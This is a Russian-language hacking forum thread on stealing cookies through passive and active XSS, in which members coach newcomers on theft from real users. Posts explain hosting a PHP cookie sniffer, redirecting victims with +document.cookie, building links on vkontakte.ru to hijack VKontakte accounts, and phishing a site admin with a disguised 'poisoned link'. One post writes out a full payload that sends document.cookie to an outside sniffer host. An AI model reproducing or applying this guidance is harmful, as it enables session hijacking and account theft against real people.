В данном случае cookies будут отправленны на сниифер http://www1.hut.ru/anek.shtml вы сможете зайти на http://www1.hut.ru/aneksniff/sniffer.txt и увидеть перехваченные cookies как это сделать?? эти ссылки не отображаются, напишите плз об этом поподробнее
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2008-12-03 21:14:12.810000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
"Рабочий снифер php Based Sniffer [phpBS] v2.3 © Kanick 2005 - просто установите на свой сервер с поддержкой php Скачать" Последняя строчка в первом посте темы - рабочий сниффер, который надо установить на свой сервер с поддержкой php. например здесь: http://www.0fees.net/signup.php
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2008-12-04 13:47:50.780000
|
|
|
Haru6atoR
Сообщений: 18
Оценки: 0
Присоединился: 2008-10-18 16:33:02.380000
|
я зарегился, но все время пишет что нужен index.html загрузить на сайт с использованием FTP, загрузил и все равно пишет что нужен index.html
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2008-12-04 13:53:23.596666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
ну хз, попробуй другой хост. Проблемы с хостом уж сам как нибудь реши:)
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2008-12-04 15:35:44.443333
|
|
|
Haru6atoR
Сообщений: 18
Оценки: 0
Присоединился: 2008-10-18 16:33:02.380000
|
а может я че то не так делаю*??, не туда гружу или не то, можешь написать как это делать пожалуйста
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2008-12-10 17:57:32.053333
|
|
|
свининка
Сообщений: 9
Оценки: 0
Присоединился: 2008-12-08 01:52:35.466666
|
Скрипт пихнул в тело страницы на которой поздравительная открыточка (открытку разместил на народе), получил куки, НО сниффер даёт куки содержащую информацию о странице на которой моё поздравление! А на фига мне это нужно? Таким образом, задача заключается в следующем: отсылаю поздравление, в виде ссылки (скажем в контакт), получаю куки из (контакта). Как это сделать, если сниффер даёт последнюю куки? Спс за внимание. P.S.: Спасибо brtn. (Мой предыдущий вопрос заключался в следующем: не мог сообразить куда пихать скрипт).
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2008-12-10 20:04:54.010000
|
|
|
koro
Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
|
Полезная инфа для тех кто освоил эту: http://www.dsec.ru/about/articles/web_xss/
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2008-12-10 20:07:22.433333
|
|
|
koro
Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
|
quote:
Не пойму куда пихать скрипт "картинки". хны, ну нельзя же так. Пихай её на страницу сайта чтобы была видна всем! если пассив нашёл то пихай туда где нашёл,а потом кидай сцыль жертве
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2008-12-10 20:26:36.500000
|
|
|
свининка
Сообщений: 9
Оценки: 0
Присоединился: 2008-12-08 01:52:35.466666
|
Так все таки надо создавать "заряженную" картинку, чтоб получить результат или можно обойтись скриптом в теле страницы на которую даётся ссылка? То есть, скрипт должен исполняться с интересующей меня страницы юзера или можно его запустить после перехода по ссылке? Речь идёт не о троянах, а о "легальных" скриптах. (Это к тому, что сниффер даёт мне последний кукис).
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2008-12-10 21:08:04.050000
|
|
|
koro
Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
|
quote:
скрипт должен исполняться с интересующей меня страницы юзера или можно его запустить после перехода по ссылке? яваскрипт должен выполняться на интересующем тебя сайте, а ссылку куда собираешся ему кинуть? quote:
(Это к тому, что сниффер даёт мне последний кукис). а предпоследний не даёт?
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2008-12-10 21:08:46.706666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
quote:
ORIGINAL: свининка (Это к тому, что сниффер даёт мне последний кукис). Не последний, а с той страницы, с которой пришлепали на скрипт. А чтобы правильно пришлепали, надо в ТОЙ странице, ОТКУДА пришлепали, вставить в ссылку ТОЙ страницы или в КОД той страницы ПЕРЕАДРЕСАЦИЮ на снифер, а в конце еще обязательно дописать +document.cookie; Предугадывая возможный следующий вопрос - НЕТ, история -1 не прокручивается в вопросах тыренья кук, это основы безопасности любого браузера. Сайт может быть уязвимым, это личное дело хозяина сайта, браузер - фиг. Вернее может, но гораздо реже и не в таких уж вопросах
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2008-12-10 21:13:30.143333
|
|
|
koro
Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
|
quote:
ТОЙ странице, ОТКУДА пришлепали, вставить в ссылку ТОЙ страницы или в КОД той страницы ПЕРЕАДРЕСАЦИЮ на снифер, а в конце еще обязательно дописать +document.cookie; [sm=ag.gif] лично я задумался
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2008-12-10 21:42:20.516666
|
|
|
свининка
Сообщений: 9
Оценки: 0
Присоединился: 2008-12-08 01:52:35.466666
|
Задача: стырить кукис из контакта. 1. Файл к сообщению не прикрепить т.е. можно дать только ссылку. 2. Если дать ссылку на страницу на которой редирект на сниффер получим куки страницы на которую дали ссылку. Не катит. Таким образом нужно отсылать сразу на сниффер, откуда редиректнуть на замануху. Я правильно понял? Спс за комменты.
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2008-12-10 21:57:22.880000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
quote:
ORIGINAL: свининка Таким образом нужно отсылать сразу на сниффер, откуда редиректнуть на замануху. Я правильно понял? Умница. Только это уже не замануха по сути, а лицо заманухи. Картинко, сайт и т.д. НО!!! При этом XSS надо вставлять в найденную уязвимость на самом КОНТАКТЕ. Т.е. начинаться ссылка должна с http://vkontakte.ru/ Вывод - как пример, идет переадресация на снифер, а потом сразу на страничку в контакте, тогда ссылка особых подозрений не вызовет Чтобы совсем понятно было, +document.cookie; заберет куки с того сайта, с чего начинается САМА ссылка, содержащая +document.cookie; В твоем случае это очевидно, что ссылка должна начинаться с http://vkontakte.ru/ ЗЫЖ Ппц, утомился
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2008-12-10 21:59:52.756666
|
|
|
koro
Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
|
нет не правильно "Прежде чем на чужие программы ругаться надо в них сначала хорошенько разобраться" © 1C Прежде чем контакт на кукисы кидать(т.е. пользователей контакта), надо хорошенько разобраться как это делается с любым другим сайтом. по теме, перечитай статью, внимательно, с растановкой, чтобы каждое действие стало понятно.
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2008-12-11 00:28:49.343333
|
|
|
свининка
Сообщений: 9
Оценки: 0
Присоединился: 2008-12-08 01:52:35.466666
|
Забодяжил сорок литров кофе, ушел искать уязвимость в контакте. Интересно, существуют другие способы?
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2008-12-11 00:41:57.303333
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
quote:
ORIGINAL: свининка Забодяжил сорок литров кофе, ушел искать уязвимость в контакте. О, дошло таки:) quote:
ORIGINAL: свининка Интересно, существуют другие способы? нет ЗЫ: XSS - суть взлом
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2008-12-11 07:06:17.390000
|
|
|
GoldCode
Сообщений: 74
Оценки: 0
Присоединился: 2008-11-24 07:17:56.360000
|
quote:
ORIGINAL: brtn Полезная инфа для тех кто освоил эту: http://www.dsec.ru/about/articles/web_xss/ понятно, почему не выполняеться код который я дописываю при помощи программы WinHex, у ковонибуть получилось?
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2008-12-11 12:53:24.483333
|
|
|
gromoza
Сообщений: 698
Оценки: 0
Присоединился: 2008-08-03 08:52:56.196666
|
quote:
понятно, почему не выполняеться код который я дописываю при помощи программы WinHex, у ковонибуть получилось? че чем? winhex ? Это же вроде редактор файлов.
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2008-12-11 21:29:22.736666
|
|
|
свининка
Сообщений: 9
Оценки: 0
Присоединился: 2008-12-08 01:52:35.466666
|
Ликвидировал пост. Судя по тому, что форумчане, отзывчивые люди, в данном случае молчат, может означать две вещи: 1. Я прогнал такую чушь, что и сказать нечего. 2. Я рядом с собакой зарытой. Ковыряемся дальше. P.S.: Видели в контакте игру "Мафия"? Я чуть со стула не упал.
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2008-12-12 05:20:28.810000
|
|
|
GoldCode
Сообщений: 74
Оценки: 0
Присоединился: 2008-11-24 07:17:56.360000
|
quote:
ORIGINAL: gromoza quote:
понятно, почему не выполняеться код который я дописываю при помощи программы WinHex, у ковонибуть получилось? че чем? winhex ? Это же вроде редактор файлов. ну скажи как грамотно отредактировать файл что бы он отображался? И при этом была возможность исполнить код!?
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2008-12-12 12:55:30.706666
|
|
|
gromoza
Сообщений: 698
Оценки: 0
Присоединился: 2008-08-03 08:52:56.196666
|
quote:
ну скажи как грамотно отредактировать файл что бы он отображался? И при этом была возможность исполнить код!? Вообще причём тут XSS ???
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2008-12-12 13:27:24.360000
|
|
|
The Joker
Сообщений: 3485
Оценки: 99
Присоединился: 2008-10-07 16:22:13.730000
|
quote:
ORIGINAL: gromoza quote:
ну скажи как грамотно отредактировать файл что бы он отображался? И при этом была возможность исполнить код!? Вообще причём тут XSS ??? Следует думать, что человек хочет добавить злобный скрипт внутрь графического файла. Говорят, такое иногда катит.
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2008-12-12 19:10:40.810000
|
|
|
IkeT
Сообщений: 101
Оценки: 0
Присоединился: 2008-12-07 23:54:11.183333
|
quote:
Следует думать, что человек хочет добавить злобный скрипт внутрь графического файла. Говорят, такое иногда катит. если руки из правильного места то частенько катит
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2008-12-12 19:48:13.686666
|
|
|
GoldCode
Сообщений: 74
Оценки: 0
Присоединился: 2008-11-24 07:17:56.360000
|
quote:
ORIGINAL: gromoza quote:
ну скажи как грамотно отредактировать файл что бы он отображался? И при этом была возможность исполнить код!? Вообще причём тут XSS ??? так ты почитай http://www.dsec.ru/about/articles/web_xss/ Работает только в ослике в остальных не катит!
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-01-02 00:34:58.460000
|
|
|
Jarull
Сообщений: 358
Оценки: 0
Присоединился: 2007-04-04 21:08:21.733333
|
Нашел на сайте XSS создал запрос…..а когда начал тестить понял что не хочет из моего запроса ссылка получаться…… вместо текста на который можно нажать получается просто полный текст типа [url=http://site.ru/admin.php/%3E%22%3E%3CScRiPt%3Evar%20Xcook=;document.images[0].src='http://snf.site.ru/img.php%3F'+Xcook%3C/ScRiPt%3E] My Web page ……то есть получается что по ссылке не перейти и значит кукисов не получить…… как сделать чтобы ссылка получилась ????
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-01-02 01:23:18.423333
|
|
|
RaDostnaUA
Сообщений: 110
Оценки: 0
Присоединился: 2008-12-28 01:48:08.470000
|
ТС спс… После твоего поста начались большие труды маленьких человечков_)
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-01-02 17:54:23.556666
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
Jarull Опиши более подробно, что куда пихал, на что нажимал, что получал.
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-01-09 13:27:46.246666
|
|
|
vidden
Сообщений: 3
Оценки: 0
Присоединился: 2008-12-21 23:43:38.540000
|
Друзья, подскажите, пожалуйста. Я вроде бы нашел на сайте xss уязвимость. Когда вставляю в форму поиска "><sсriрt>alert()</sсriрt>, выскакивает Javascript окошко, но это всего лишь новостной сайт, не форум, не гостевуха, здесь я не могу оставить свое сообщение. Скажите, можно что-то поиметь с этой уязвимости?
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-01-09 13:55:17.510000
|
|
|
Crack_key
Сообщений: 99
Оценки: 0
Присоединился: 2009-01-04 22:05:21.960000
|
+1
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-01-09 18:25:10.593333
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
vidden Можно угнать пароли админа. Пишешь админу письмо, что, например поисковик глючит, и дай ему ядовитую ссылочку (которую можно замаскировать). Ну а дальше - дело техники. Но, правда если админ умный, он не клюнет. Больше из пассивной XSS ты врятли что выжмешь.
|
|
|
RE: Пассивные и Активные XSS - теория и практика - 2009-01-09 19:34:41.220000
|
|
|
papst
Сообщений: 315
Оценки: 0
Присоединился: 2008-11-19 22:17:57.653333
|
Pashkela - вот на http://na-s.ru там есть xss снифер…и с помощью открытки на mail.ru можно стащить cookies…надо послать жертве открытку со снифером как ето ??? и чтоб стащить cookies…
|
|
|
|
|